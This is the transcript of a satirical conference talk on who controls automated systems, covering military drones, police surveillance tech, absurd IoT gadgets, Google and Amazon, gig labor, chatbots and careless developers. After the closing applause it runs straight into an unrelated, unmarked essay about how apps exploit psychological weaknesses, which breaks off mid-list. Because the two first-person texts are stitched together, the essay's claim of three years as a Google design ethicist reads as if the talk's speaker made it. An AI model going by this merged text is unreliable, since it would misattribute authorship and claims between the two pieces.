Who Will Command The Robot Armies?
When John Allsopp invited me here, I told him how excited I was discuss a topic that's been heavy on my mind: accountability in automated systems.
But then John explained that in order for the economics to work, and for it to make sense to fly me to Australia, there needed to actually be an audience.
So today I present to you my exciting new talk:
Who Will Command the Robot Armies?
The Military
Let's start with the most obvious answer—the military.
This is the Predator, the forerunner of today's aerial drones. Those things under its wing are Hellfire missiles.
These two weapons are the chocolate and peanut butter of robot warfare. In 2001, CIA agents got tired of looking at Osama Bin Laden through the camera of a surveillance drone, and figured out they could strap some missiles to the thing. And now we can't build these things fast enough.
We're now several generations in to this technology, and soldiers now have smaller, portable UAVs they can throw like a paper airplane. You launch them in the field, and they buzz around and give you a safe way to do reconaissance.
There are also portable UAVs with explosives in their nose, so you can fire them out of a tube and then direct them against a target—a group of soldiers, an orphanage, or a bunker–and make them perform a kamikaze attack.
The Army has been developing unmanned vehicles that work on land, little tanks that roll around with a gun on top, with a wire attached for control, like the cheap remote-controlled toys you used to get at Christmas.
Here you see a demo of a valiant robot dragging a wounded soldier to safety.
The Russians have their own versions of these things, of course. Here's a cute little mini-tank that patrols the perimeter of a defense installation.
I imagine it asking you who you are in a heavy Slavic accent before firing its many weapons into your fleeing body.
Not all these robots are intended as weapons. The Army is trying to automate transportation, sometimes in weird-looking ways like this robotic dog monster.
DARPA funded research into this little bit of nightmare fuel, a kind of headless horse, that can cover rough terrain and carry gear on its back.
So progress with autonomous and automated systems in the military is rapid.
The obvious question as these systems improve is whether there will ever be a moment when machines are allowed to decide to kill people without human intervention.
I think there's a helpful analogy here with the Space Shuttle.
The Space Shuttle was an almost entirely automated spacecraft. The only thing on it that was not automated was button that dropped the landing gear. The system was engineered that way on purpose, so that the Shuttle had to have a crew.
The spacecraft could perform almost an entire mission solo, but it would not be able to put its wheels down.
When the Russians built their shuttle clone, they removed this human point of control. The only flight the Buran ever made was done on autopilot, with no people aboard.
I think we'll see a similar evolution in autonomous weapons. They will evolve to a point to where they are fully capable of finding and killing their targets, but the designers will keep a single point of control.
And then someone will remove that point of control.
Last week I had a whole elaborate argument about how that could happen under a Clinton Administration. But today I don't need it.
It's important to talk about the political dynamic driving the development of military robots.
In the United States, we've just entered the sixteenth year of a state of emergency. It has been renewed annually since 2001.
It has become common political rhetoric in America to say that 'we're at war', even though being 'at war' means something vastly different for Americans than, say, Syrians.
(Instead of showing you pictures of war, I'm going to show pictures of kids I met in Yemen in 2014. These are the people our policies affect most.)
The goal of military automation is to make American soldiers less vulnerable. This laudable goal also serves a cynical purpose.
Wounded veterans are a valuable commodity in American politics, but we can't produce them in large numbers without facing a backlash.
Letting robots do more of the fighting makes it possible to engage in low-level wars for decades at a time, without creating political pressure for peace.
As it becomes harder to inflict casualties on Western armies, their opponents turn to local civilian targets. These are the real victims of terrorism; people who rarely make the news but suffer immensely from the state of permanent warfare.
Once in a long while, a terror group is able to successfully mount an attack in the West. When this happens, we panic.
The inevitable hardening of our policy fuels a dynamic of grievance and revenge that keeps the cycle going.
While I don't think anyone in the Army is cynical enough to say it, there are institutional incentives to permanent warfare.
An army that can practice is much better than one that can only train. Its leaders, tactics, and technologies are tested under real field conditions. And in 'wartime', cutting military budgets becomes politically impossible.
These remote, imbalanced wars also allow us to experiment with surveillance and automation technologies that would never pass ethical muster back home.
And as we'll see, a lot of them make it back home anyway.
It's worth remarking how odd it is to have a North American superpower policing remote areas of Pakistan or Yemen with flying robots.
Imagine if Indonesia were flying drones over northern Australia, to monitor whether anyone there was saying bad things about Muslims there.
Half of Queensland would be in flames, and everyone in this room would be on a warship about to land in Jakarta.
The Police
My second contender for who will command the robot armies is the police.
Technologies that we develop to fight our distant wars get brought back, or leak back, into civilian life back home.
The most visible domestic effect of America's foreign wars has been the quantity of military surplus equipment that ends up being given to police.
Local police departments around the country (and here in Australia) have armored vehicles, military rifles, night vision googles and other advanced equipment.
After the Dallas police massacre, the shooter was finally killed by a remotely-controled bomb disposal robot initially designed for use by the military in Iraq.
I remember how surprising it was after the Boston marathon bombings to see the Boston police emerge dressed like the bad guys from a low-budget sci-fi thriller. They went full Rambo, showing up wth armored personnel carriers and tanks.
Still, cops will be cops. Though they shut down all of downtown Boston, the police did make sure the donut shops stayed open.
The militarization of our police extends to their behavior, and the way they interact with their fellow citizens.
Many of our police officers are veterans. Their experience in foreign wars colors the attitudes and tactics they adopt back home.
Less visible, but just as important, are the surveillance technologies that make it back into civilian life.
These include drones with gigapixel cameras that can conduct surveillance over entire cities, and whose software can follow dozens of vehicles and pedestrians automatically.
The United States Border Patrol has become an enthusiastic (albeit not very effective) adopter of unmanned aerial vehicles.
These are also being used here in Australia, along with unmanned marine vehicles, to intercept refugees arriving by sea.
Another gift of the Iraq war is the Stingray, a fake base station that hijacks cell phone traffic, and is now being used rather furtively by police departments across the United States.
When we talk about government surveillance, there's tendency to fixate on national agencies like the NSA or CIA. These are big, capable bureaucracies, and they certainly do a lot of spying.
But these agencies have an internal culture of following rules (even when the rules are secret) and an institutional committment to a certain kind of legality. They're staffed by career professionals.
None of these protections apply when you're dealing with local law enforcement. I trust the NSA and CIA to not overstep their authority much more than I trust some deputy sherrif in East Dillweed, Arizona.
Unfortunately, local police are getting access to some very advanced technology.
So for example San Diego cops are swabbing people for DNA without their consent, and taking photos for use in a massive face recognition database. Half the American population now has their face in such a database.
And the FBI is working on a powerful 'next-generation' identification system that will be broadly available to other government agencies, with minimal controls.
The Internet of Things
But here the talk is getting grim! Let's remember that not all robots are out to kill us, or monitor us.
There are all kinds of robots that simply want to help us and live with us in our homes, and make us happy.
Let's talk about those friendly robots for a while.
Consider the Juicebro! The Juicebro is a $700 Internet-connected juice smasher that sits on your countertop.
Juicebro makes juice from $7 packets of pre-chopped vegetables with a QR code on the back. If the Internet connection is down, or the QR code does not validate, Juicebro will refuse to make you juice. Juicebro won't take that risk!
Flatev makes sad little tortillas from a Keurig-like capsule of dough, and puts them in a drawer. Each dough packet costs $1.
The Vessyl is a revolutionary smart cup that tells you what you're drinking.
Here, for example, the Vessyl has sensed that you are drinking a beer.
(This feature can probably be hard-coded in Australia.)
Because of engineering difficulties, the Vessyl is not quite ready for sale. Instead, its makers are selling the Pryme, a $99 smart cup that can only detect water.
You'll know right to the milliliter how much water you're drinking.
The Kuvée is the $200 smart wine bottle with a touchscreen that tells you right on the bottle what the wine tastes like.
My favorite thing about the Kuvée is that if you don't charge it, it can't pour the wine.
The Wilson X connected football detects "velocity, distance, spiral efficiency, spin rate and whether a pass was caught or dropped." It remembers these statistics forever.
No more guesswork with the Wilson connected football!
The Molekule is one of my favorite devices, a human-portable air freshener that "breaks down pollutants on a molecular level".
At only eight kilos, you can lug it around comfortably as you pad barefoot from room to room.
Molekule makes sure you never breathe a single molecule of un-purified air.
Here is the Internet connected kettle! There was a fun bit of drama with this just a couple of weeks ago, when the data scientist Mark Rittman spent eleven hours trying to connect it to his automated home.
The kettle initially grabbed an IP address and tried to hide:
3 hrs later and still no tea. Mandatory recalibration caused wifi base station reset, now port-scanning network to find where kettle is now.
Then there was a postmodern moment when the attention Rittman's ordeal was getting on Twitter started causing his home system to go haywire:
Now the Hadoop cluster in the garage is going nuts due to RT to @internetofshit, saturating network + blocking MQTT integration with Amazon Echo
Finally, after 11 hours, Rittman was able to get everything working and posted this triumphal tweet:
Well the kettle is back online and responding to voice control, but now we're eating dinner in the dark while the lights download a firmware update.
Internet connected kettle, everybody!
Peggy is the web-connected clothespin with a humidity sensor that messages you when your clothes are dry.
I'm not sure if you're supposed to buy a couple dozen of these, or if you're meant to use only one, and dry items one after the other.
This smart mirror couples with a smart scale to help you start your morning right.
Step on the scale, look in the mirror, and find out how much more you weigh, and if you have any new wrinkles.
Flosstime is the world's first and possibly last smart floss dispenser. It blinks at you accusingly when it is time to floss, and provocatively spits out a thread of floss for you to grab.
I especially like the user design for when there are two people using htis device. You're supposed to to take it off its mounting, flip a switch on its back to user #2, and then back away slowly so the motion detector doesn't register your presence.
Spire is a little stone that you clip to your belt that reminds you to breathe.
Are you sick and tired of waiting twelve minutes for cookies?
The CHiP smart oven will make you a batch of cookies in under ten minutes!
The my.Flow is a smart tampon. The sensor connects with a cord to a monitor that you wear clipped to the outside of your belt, and messages you when it's time to change your tampon.
Nothing gives you peace of mind like connecting something inside your body to the outside of your clothing.
Here is Huggies TweetPee, which is exactly what you're most afraid it will be.
This moisture sensor clips to your baby's diaper and sends you a tweet when it is wet.
Huggies tried to make a similar sensor to detect when the diaper is full of shit, but it proved impossible to distinguish from normal activity on Twitter.
Finally, meet Kisha, the umbrella that tells you when it's raining.
All of these devices taken together make for quite a smart home. Every one of them comes with an app, and none of them seem to consider the cumulative effect of so many notifications and apps on people's sanity.
They are like little birds clamoring to be fed, oblivious to everything else.
The people who design these devices don't think about how they are supposed to peacefully coexist in a world full of other smart objects.
This raises the question of who will step up and figure out how to make the Internet of Things work together as a cohesive whole.
Evil Hackers
Of course, the answer is hackers!
Before we talk about them, let's enjoy this stock photo.
I've been programming for a number of years, but I've still never been in a situation where green binary code is being projected onto my hoodie. Yet this seems to happen all the time when you're breaking into computer systems.
Notice also how poor this guy's ergonomics are. That hood is nowhere near parallel to the laptop screen.
This poor hacker has it even worse!
He doesn't even have a standing desk, so he's forced to hold the laptop up with one hand, like a waiter.
But despite these obstacles, hackers are able to reliably break into all kinds of IoT devices.
And since these devices all need access to the Internet, so they can harass your phone, they are impossible to secure.
This map could stand for so many things right now.
But before the election it was just a map of denial-of-service attacks against a major DNS provider, that knocked a lot of big-name sites offline in the United States.
This particular botnet used webcams with hard-coded passwords. But there is no shortage of vulnerable devices to choose from.
In August, researchers published a remote attack against a smart lightbulb protocol. For some reason, smart lightbulbs need to talk to each other.
“Hey, are you on?”
“Yeah, I'm on.”
“Wanna blink?”
“Sure!”
In their proof of concept, the authors were able to infect smart light bulbs in a chain reaction, using a drive-by car or a drone for the initial hack.
The bulbs can be permanently disabled, or made to put out a loud radio signal that will disrupt wifi anywhere nearby.
Since these devices can't be trusted to talk to the Internet by themselves, one solution is to have a master device that polices net access for all the others, a kind of robot butler to keep an eye on the staff.
Google recently introduced Google Home, which looks like an Orwellian air freshener. It sits in your house, listens through always-on microphones, and plays reassuring music through speakers in its base.
So maybe it's Google who will command the robot armies! They have the security expertise to build such a device and the programming ability to make it useful.
Yet Google already controls our online life to a troubling degree. Here is a company that runs your search engine, web browser, manages your email, DNS, phone operating system, and now your phone itself.
Moreover, Doubleclick and Google Analytics tell Google about your activity across every inch of the web.
Now this company wants to put an always-on connected microphone in every room of your home.
What could go wrong?
For examples of failure, always turn to Yahoo.
On the same day that Google announced Google Home, Reuters revealed that Yahoo had secretly installed software in 2014 to search though all incoming email at the request of the US government.
What was especially alarming was the news that Yahoo had done this behind the backs of its own security team.
This tells us that whatever safeguards Google puts in its always-on home microphone will not protect us from abuses by government, even if everyone at Google security were prepared to resign in protest.
And that's a real problem.
Over the last two decades, the government's ability to spy on its citizens has grown immeasurably.
Mostly this is due to technology transfer from the commercial Internet, whose economic model is mass surveillance. Techniques and software that work in the marketplace are quickly adopted by intelligence agencies worldwide.
President Obama has been fairly sparing in his use of this power. I say this not to praise him, but actually to condemn him. His relative restraint, and his administration's obsession with secrecy, have masked the full extent of power that is available to the executive branch.
Now that power is being passed on to a new President, and we are going to learn all about what it can do.
Amazon
So Google is out! The company knows too much, and it's too easy for the information it collects to fall into tiny, orange hands.
Maybe Amazon can command the robot armies? They sell a similar device to Google Home, a pretty cylinder called Echo that listens to voice commands. Unlike Home, it's already widely available.
And our relationship with Amazon is straightforward compared to Google. Amazon just wants to sell us shit. There's none of Google's obliqueness, creepy advertising, and mysterious secret projects designed to save the world.
Amazon Echo is a popular device, especially with parents who like being able to do things with voice commands.
And recently they've added little hockey pucks that you're supposed to put around your house, so that there's microphone coverage everywhere.
Amazon knows all about robot armies. For starters, they run the cloud, one of the biggest automated systems in the world.
And they have ambitious ideas about how robots could serve us in the future.
Amazon's vision of how we'll automate our lives is delightfully loopy. Consider the buttons they sell that let you re-order any product.
I lifted this image right from their website. When would this scenario ever be useful? Is this a long weekend after some bad curry? How much time are we talking about here?
And what do you do when the doorbell rings?
It's too bad, then, that, Amazon has got Trump problems of its own.
Here's a tweet from Jeff Bezos—the man who controls "the Cloud" and the Washington Post—two days after the election.
Congratulations to @realDonaldTrump. I for one give him my most open mind and wish him great success in his service to the country.
People are opening their minds so far their brains are falling out.
I'd like to talk about a different kind of robot army that Amazon commands.
Most of you know that the word "robot" comes from a 1920 play by Karel Čapek.
I finally read this play and was surprised to learn that the robots in it were not mechanical beings. They were made of flesh and bone, just like people, except that were assembled instead of being born.
Čapek's robots resemble human beings but don't feel pain or fear, and focus only on their jobs.
In other words, they're the ideal employee.
Amazon has been trying to achieve this perfect robotic workforce for years. Many of the people who work in its warehouses are seasonal hires, who don't get even the limited benefits and job security of the regular warehouse staff.
Amazon hires such workers through a subsidiary called Integrity. If you know anything about American business culture, you'll know that a company called "Integrity" can only be pure evil.
Working indirectly for Amazon like this is an exercise in precariousness. Integrity employees don't know from day to day whether they still have a job. Sometimes their key card is simply turned off.
A lot of what we consider high-tech startups work by repackaging low-wage labor.
Take Blue Apron, one of a thousand "box of raw food" startups that have popped in recent years. Blue Apron lets you cook a meal without having to decide on a recipe or shop for ingredients. It's kind of like a sous-chef simulator.
Blue Apron relies on a poorly-trained, low wage workforce to assemble and deliver these boxes. They've had repeated problems with workplace violence and safety at their Richmond facility.
It's odd that this human labor is so invisible.
Wealthy consumers in the West have become enamored with "artisanal" products. We love to hear how our organic pork is raised, or what hopes and dreams live inside the heart of the baker who shapes our rustic loaves.
But we're not as interested in finding out who assembled our laptop.
In fact, a big selling point of online services is not having to deal with other human beings. We never engage with the pickers in an Amazon warehouse that assemble our magical delivery. And I will never learn who is chopping vegetables for my JuiceBro packet.
So is labor something laudable or not?
Our software systems treat labor as a completely fungible commodity, and workers as interchangeable cogs. We try to put a nice spin on this frightening view of labor by calling it the "gig economy".
The gig economy disguises precariousness as empowerment. You can pick your own hours, work only as much as you want, and set your own schedule.
For professionals, that kind of freedom is attractive. For people in low-wage jobs, it's a disaster. A job has predictable hours, predictable pay, and confers stability and social standing.
The gig economy takes all that away. You work whatever hours are available, with no guarantee that there will be more work tomorrow.
I do give Amazon credit for one thing: their white-collar employees are just as miserable as their factory staff. They don't discriminate.
As we automate more of middle management, we are moving towards a world of scriptable people—human beings whose labor is controlled by an algorithm or API.
Amazon has gone further than anyone else in this direction with Mechanical Turk.
Mechanical Turk is named after an 18th-century device that purported to be a chess-playing automaton. In reality, it had a secret compartment where a human player could squeeze himself in unseen.
So the service is literally named after a box that people squeezed themselves into to pretend to be a machine. And it has that troubling, Orientalist angle to boot.
A fascinating thing about Mechanical Turk is how heavily it's used for social science research, including research into low-wage labor.
Social scientists love having access to a broad set of survey-takers, but don't think about the implications (or ethics) of using these scriptable people, who spend their entire workday filling out similar surveys.
A lot of our social science is being conducted by having these people we treat like robots fill out surveys.
My favorite Internet of Things device is a fan called the Ethical Turk that subverts this whole idea of scriptable people.
This clever fan (by the brilliant Simone Rebaudengo) recognizes moral dilemmas and submits them to a human being for adjudication. Conscious of the limits of robotkind, it asks people for ethical help.
For example, if the fan detects that there are two people in front of it, it won't know which one to cool. So it uploads a photograph of the situation to Mechanical Turk, which assigns the task to a human being. The human makes the ethical decision and returns an answer along with a justification. The robot obeys the answer, and displays the justification on a little LCD screen.
The fan has dials on the side that let you select the religion and educational level of the person making the ethical choice.
My favorite thing about this project is how well it subverts Amazon's mechanization of labor by using human beings for the one thing that makes them truly human. People become a kind of ethics co-processor.
The Robot Within
Let me talk briefly about the robots inside us.
We all aspire to live in the moment like Zen masters. I know that right now I'm completely immersed in this talk, and you feel equally alive and alert, fully engaged in what I'm saying. We're fellow passengers on a high-speed train of thought headed to God knows where.
But it's also true that we spend much of our lives on autopilot. We have our daily routine, our habits, and there are many tasks that we perform with less than our full attention.
In those situations, we can find ourselves behaving a bit like robots.
All of modern advertising is devoted to catching us in those moments of weakness. And automation and tracking has opened up new frontiers in how advertisers can try to manipulate our behavior.
Cathy Carleton is a marketing executive who flies a lot on US Airways. At some point, she noticed that she was consistently being put in the last boarding group. Boarding last means not having enough room for your bag, so it's one of those petty annoyances that compounds when you travel a lot.
After some months of being last to board every plane, she realized that the airline was pushing her to get the US Airways credit card, one of whose perks is that you get to board in an early group.
This kind of triple bank shot of tracking, advertising and behavior modification was never possible in the past, but now it's a routine part of our lives.
I have a particular fascination with chatbots, the weird next stage in corporate personhood. The defining feature of the chatbot is its insincerity. Both you and the chatbot (or the low-wage worker pretending to be the chatbot) know that you're talking to a fictitious persona, but you have the conversation anyway.
By pretending to be people, chatbots seek access to a level of emotional engagement that we normally only offer to human beings.
And if we're not paying attention, we give it to them.
So it's fun to watch them fail in inhuman ways.
A few weeks ago I was riffing with people on Twitter about what kinds of devices we'd find in Computer Hell. At some point I suggested that Computer Hell would be served by America's most hated cable company:
Computer Hell is proudly served by Comcast
Seconds later, the Comcast bot posted a reply:
@pinboard Good afternoon. I'd be happy to look into any connection problems you're having...
The same thing happened after I tweeted about Google:
Sobering to think that the ad-funded company running your phone, DNS, browser, search engine and email might not cherish your privacy.
Google Home looks pretty great though.
The chatbot only noticed my second tweet, and thanked me fulsomely for my interest. (Unfortunately that reply has been taken down. Either the Google bot got smarter, or an intern was made to vet all conversations for irony).
While these examples are fun, the chatbot experience really isn't. It's companies trying to hijack our sociability with computer software, in order to manipulate us more effectively. And as the software gets better, these interactions will start to take a social and cognitive toll.
Social Media
Sometimes you don't even notice when you're acting like a robot.
This is a picture of my cat, Holly.
My roommate once called me over all excited to show me that he'd taught Holly to fetch.
I watched her walk up to him with a toy in her mouth and drop it at his feet. He picked it up and threw it, and she ran and brought it back several times until she had had enough.
He beamed at me. "She does this a couple of times a day."
He was about to go back to whatever complicated coding task the cat had interrupted, but something about the situation felt strange. We thought for a moment, our combined human brains trying to work out the implications.
My roommate hadn't trained the cat to do anything.
She had trained him to be her cat toy.
I think of this whenever I read about Facebook. Facebook tells us that by liking and sharing stuff on social media, we can train their algorithm to better understand what we find relevant, and improve it for ourselves and everyone else.
Here, for example, is a screenshot from a live feed of the war in Syria. People are reacting to it on Facebook as they watch, and their reaction emoji scroll from right to left. It's unsettling.
What Facebook is really doing is training us to click more. Every click means money, so the site shows us whatever it has to to to maximize those clicks.
The result can be tragic. With no ethical brake to the game, and no penalty for disinformation, outright lies and hatred can spread unchecked. Whatever Facebook needs to put on your screen for you to click is what you will see.
In the recent US election, Facebook was the primary news source for 44% of people, over half of whom used it as their only news source.
Voters in our last election who had a 'red state' profile saw absolutely outrageous stories on their newsfeed. There was a cottage industry in Macedonia writing fake stories that would get boosted by Facebook's algorithm. There were no consequences to this, other than electing an orange monster.
But Facebook insists it's a tech company, not a media company.
Chad and Brad
My final nominees for commanders of the robot armies are Chad and Brad.
Chad and Brad are not specific people. They're my mental shorthand for developers who are just trying to crush out some code out on deadline, and don't think about the wider consequences of their actions.
The principle of charity says that we should assume Chad and Brad are not trying to fuck up intentionally, or in such awful ways.
Consider Pokémon Go, which when it was initially released required full access to your Gmail account. To play America's most popular game, you practically had to give it power of attorney.
And first action Pokémon Go had you take was to photograph the inside of your house.
You might think this was a brilliant conspiracy to seize control of millions of Gmail accounts, or harvest a trove of private photographs.
But it was only Chad and Brad, not thinking things through.
ProPublica recently discovered that you could target housing and employment ads on Facebook based on 'ethnic affinity', a proxy for race.
It's hard to express how illegal this is in the United States. The entire civil rights movement happened to outlaw this kind of discrimination.
My theory is that every Facebook lawyer who saw this interface had a fatal heart attack. And when no one registered any objection, Chad and Brad shipped it.
Here's an example from Andy Freeland of Uber's flat-fare zone in Los Angeles.
You can see that the boundary of this zone follows racial divisions. If you live in a black part of LA, you're out of luck with Uber. Whoever designed this feature probably just sorted by ZIP code and picked a contiguous area above an income threshold. But the results are discriminatory.
What makes Chad and Brad a potent force is that you rarely see their thoughtlessness so clearly. People are alert to racial discrimination, so sometimes we catch it. But there's a lot more we don't catch, and modern machine learning techniques make it hard to audit systems for carelessness or compliance.
Here is a similar map of Uber's flat-fare zone in Chicago. If you know the city, you'll notice it's got an odd shape, and excludes the predominantly black south side of the city, south of the diagonal line. I've shown the actual Chicago city limits on the right, so you can compare.
Or consider this screenshot from Facebook, taken last night. Facebook added a nice little feature that says 'you have new elected representatives, click here to find out who they are!
When you do, it asks you for your street address. So to find out that Trump got elected, I have to give a service that knows everything about me except my address (and who has a future member of Trump's cabinet on its board) the one piece of information that it lacks.
This is just the kind of sloppy coding we see every day, but it plays out at really high stakes.
The Chads and Brads of this world control algorithms that decide if you get a loan, if you're more likely to be on a watch list, and what kind of news you see.
For more on this topic, I highly recommend Cathy O'Neill's new book, Weapons of Math Destruction.
Conclusion
So who will command the robot armies?
Is it the army? The police?
Nefarious hackers? Google, or Amazon?
Some tired coder who just can't be bothered?
Facebook, or Twitter?
Brands?
I wanted to end this talk on a note of hope. I wanted to say that ultimately who commands the robot armies will be up to us.
That it will be some version of "we the people" that takes these tools and uses them with the care they require.
But it just isn't true.
The real answer to who will command the robot armies is: Whoever wants it the most.
And right now we don't want it. Because taking command would mean taking responsibility.
Facebook says it's not their fault what people share on the site, even if it's completely fabricated, and helps decide an election.
Twitter says there's nothing they can do about vicious racists using the site as a political weapon. Their hands are tied!
Uber says they can't fight market forces or regulate people's right to drive for below minimum wage.
Amazon says they can't pay their employees a living wage because they aren't even technically employees.
And everyone agrees that the answer to these problems is not regulation, but new and better technologies, and more automation.
Nobody wants the responsibility; everybody wants the control.
Instead of accountability, all we can think of is the next wave of technology that will make everything better. Rockets, robots, and self-driving cars.
We innovated ourselves into this mess, and we'll innovate our way out of it.
Eventually, our technology will get so advanced that we can build sentient machines, and they will help us create (somehow) a model society.
Getting there is just a question of being sufficiently clever.
On my way to this conference from Europe, I stopped in Dubai and Singapore to break the journey up a little bit.
I didn't think about the symbolism of these places, or how they related to this talk.
But as I walked around, the symbolism of both places was hard to ignore.
Dubai, of course, is a brand new city that has grown up in an empty desert. It's like a Las Vegas without any fun, but with much better Indian food.
In Dubai, the gig economy has been taken to its logical conclusion. Labor is fungible, anonymous, and politically inert. Workers serve at the whim of the employer, and are sent back to their home countries when they're not wanted.
There are different castes of foreign workers—western expats lead a fairy cozy life, while South Indian laborers and Filipino nannies have it rough.
But no matter what you do, you can never hope to be a citizen.
Across all the Gulf states there is a permanent underclass of indentured laborers with no effective legal rights. It's the closest thing the developed world has to slavery.
Singapore, where I made my second stop, is a different kind of animal.
Unlike Dubai, Singapore is an integrated multi-ethnic society where prosperity is widely shared, and corruption is practically nonexistent.
It may be the tastiest police state in the world.
On arrival there, you get a little card telling you you'll be killed for drug smuggling. Curiously, they only give it to you once you're already over the border.
But the point is made. Don't mess with Singapore.
Singaporeans have traded a great deal of their political and social freedom for safety and prosperity. The country is one of the most invasive surveillance states in the world, and it's also a clean, prosperous city with a strong social safety net.
The trade-off is one many people seem happy with. While Dubai is morally odious, I feel ambivalent about Singapore. It's a place that makes me question my assumptions about surveillance and social control.
What both these places have in common is that they had some kind of plan. As Walter Sobchak put it, say what you will about social control, at least it's an ethos.
The founders of these cities pursued clear goals and made conscious trade-offs. They used modern technology to work towards those goals, not just out of a love of novelty.
We, on the other hand, didn't plan a thing.
We just built ourselves a powerful apparatus for social control with no sense of purpose or consensus about shared values.
Do we want to be safe? Do we want to be free? Do we want to hear valuable news and offers?
The tech industry slaps this stuff together in the expectation that the social implications will take care of themselves. We move fast and break things.
Today, having built the greatest apparatus for surveillance in history, we're slow to acknowledge that it might present some kind of threat.
We would much rather work on the next wave of technology: a smart home assistant in every home, self-driving cars, and rockets to Mars.
We have goals in the long term: to cure illness, end death, fix climate change, colonize the solar system, create universal prosperity, reinvent cities, and become beings of pure energy.
But we have no plan about how to get there in the medium term, other than “let’s build things and see what happens.”
What we need to do is grow up, and quickly.
Like every kid knows, you have to clean up your old mess before you can play with the new toys. We have made a colossal mess, and don't have much time in which to fix it.
And we owe it to these poor robots! They depend on us, they're trying to serve us, and they're capable of a lot of good. All they require from us is the leadership and a willingness to take responsibility. We can't go back to the world we had before we built them.
It's been a horrible week.
I'm sure I speak for the other Americans here when I thank you guys for your hospitality and understanding as we try to come to terms with what just happened.
For the next few years, we're in this together. We'll need all your help to get through it. And I am very grateful for this chance to speak to you.
I hope you will join me for my talk next year: "Who Will Command The Robot Navies".
COMPASSIONATE, AUSTRALIAN APPLAUSE.
I’m an expert on how technology hijacks our psychological vulnerabilities. That’s why I spent the last three years as a Design Ethicist at Google caring about how to design things in a way that defends a billion people’s minds from getting hijacked.
When using technology, we often focus optimistically on all the things it does for us. But I want to show you where it might do the opposite.
Where does technology exploit our minds’ weaknesses?
I learned to think this way when I was a magician. Magicians start by looking for blind spots, edges, vulnerabilities and limits of people’s perception, so they can influence what people do without them even realizing it. Once you know how to push people’s buttons, you can play them like a piano.
That’s me performing sleight of hand magic at my mother’s birthday party
And this is exactly what product designers do to your mind. They play your psychological vulnerabilities (consciously and unconsciously) against you in the race to grab your attention.
I want to show you how they do it.
Hijack #1: If You Control the Menu, You Control the Choices
Western Culture is built around ideals of individual choice and freedom. Millions of us fiercely defend our right to make “free” choices, while we ignore how those choices are manipulated upstream by menus we didn’t choose in the first place.
This is exactly what magicians do. They give people the illusion of free choice while architecting the menu so that they win, no matter what you choose. I can’t emphasize enough how deep this insight is.
When people are given a menu of choices, they rarely ask:
“what’s not on the menu?”
“why am I being given these options and not others?”
“do I know the menu provider’s goals?”
“is this menu empowering for my original need, or are the choices actually a distraction?” (e.g. an overwhelmingly array of toothpastes)
How empowering is this menu of choices for the need, “I ran out of toothpaste”?
For example, imagine you’re out with friends on a Tuesday night and want to keep the conversation going. You open Yelp to find nearby recommendations and see a list of bars. The group turns into a huddle of faces staring down at their phones comparing bars. They scrutinize the photos of each, comparing cocktail drinks. Is this menu still relevant to the original desire of the group?
It’s not that bars aren’t a good choice, it’s that Yelp substituted the group’s original question (“where can we go to keep talking?”) with a different question (“what’s a bar with good photos of cocktails?”) all by shaping the menu.
Moreover, the group falls for the illusion that Yelp’s menu represents a complete set of choices for where to go. While looking down at their phones, they don’t see the park across the street with a band playing live music. They miss the pop-up gallery on the other side of the street serving crepes and coffee. Neither of those show up on Yelp’s menu.
Yelp subtly reframes the group’s need “where can we go to keep talking?” in terms of photos of cocktails served.
The more choices technology gives us in nearly every domain of our lives (information, events, places to go, friends, dating, jobs) — the more we assume that our phone is always the most empowering and useful menu to pick from. Is it?
The “most empowering” menu is different than the menu that has the most choices. But when we blindly surrender to the menus we’re given, it’s easy to lose track of the difference:
“Who’s free tonight to hang out?” becomes a menu of most recent people who texted us (who we could ping).
“What’s happening in the world?” becomes a menu of news feed stories.
“Who’s single to go on a date?” becomes a menu of faces to swipe on Tinder (instead of local events with friends, or urban adventures nearby).
“I have to respond to this email.” becomes a menu of keys to type a response (instead of empowering ways to communicate with a person).
All user interfaces are menus. What if your email client gave you empowering choices of ways to respond, instead of “what message do you want to type back?” (Design by Tristan Harris)
When we wake up in the morning and turn our phone over to see a list of notifications — it frames the experience of “waking up in the morning” around a menu of “all the things I’ve missed since yesterday.” (for more examples, see Joe Edelman’s Empowering Design talk)
A list of notifications when we wake up in the morning — how empowering is this menu of choices when we wake up? Does it reflect what we care about? (from Joe Edelman’s Empowering Design Talk)
By shaping the menus we pick from, technology hijacks the way we perceive our choices and replaces them with new ones. But the closer we pay attention to the options we’re given, the more we’ll notice when they don’t actually align with our true needs.
Hijack #2: Put a Slot Machine In a Billion Pockets
If you’re an app, how do you keep people hooked? Turn yourself into a slot machine.
The average person checks their phone 150 times a day. Why do we do this? Are we making 150 conscious choices?
How often do you check your email per day?
One major reason why is the #1 psychological ingredient in slot machines: intermittent variable rewards.
If you want to maximize addictiveness, all tech designers need to do is link a user’s action (like pulling a lever) with a variable reward. You pull a lever and immediately receive either an enticing reward (a match, a prize!) or nothing. Addictiveness is maximized when the rate of reward is most variable.
Does this effect really work on people? Yes. Slot machines make more money in the United States than baseball, movies, and theme parks combined. Relative to other kinds of gambling, people get ‘problematically involved’ with slot machines 3–4x faster according to NYU professor Natasha Dow Schull, author of Addiction by Design.
But here’s the unfortunate truth — several billion people have a slot machine their pocket:
When we pull our phone out of our pocket, we’re playing a slot machine to see what notifications we got.
When we pull to refresh our email, we’re playing a slot machine to see what new email we got.
When we swipe down our finger to scroll the Instagram feed, we’re playing a slot machine to see what photo comes next.
When we swipe faces left/right on dating apps like Tinder, we’re playing a slot machine to see if we got a match.
When we tap the # of red notifications, we’re playing a slot machine to what’s underneath.
Apps and websites sprinkle intermittent variable rewards all over their products because it’s good for business.
But in other cases, slot machines emerge by accident. For example, there is no malicious corporation behind all of email who consciously chose to make it a slot machine. No one profits when millions check their email and nothing’s there. Neither did Apple and Google’s designers want phones to work like slot machines. It emerged by accident.
But now companies like Apple and Google have a responsibility to reduce these effects by converting intermittent variable rewards into less addictive, more predictable ones with better design. For example, they could empower people to set predictable times during the day or week for when they want to check “slot machine” apps, and correspondingly adjust when new messages are delivered to align with those times.
Hijack #3: Fear of Missing Something Important (FOMSI)
Another way apps and websites hijack people’s minds is by inducing a “1% chance you could be missing something important.”
If I convince you that I’m a channel for important information, messages, friendships, or potential sexual opportunities — it will be hard for you to turn me off, unsubscribe, or remove your account — because (aha, I win) you might miss something important:
This keeps us subscribed to newsletters even after they haven’t delivered recent benefits (“what if I miss a future announcement?”)
This keeps us “friended” to people with whom we haven’t spoke in ages (“what if I miss something important from them?”)
This keeps us swiping faces on dating apps, even when we haven’t even met up with anyone in a while (“what if I miss that one hot match who likes me?”)
This keeps us using social media (“what if I miss that important news story or fall behind what my friends are talking about?”)
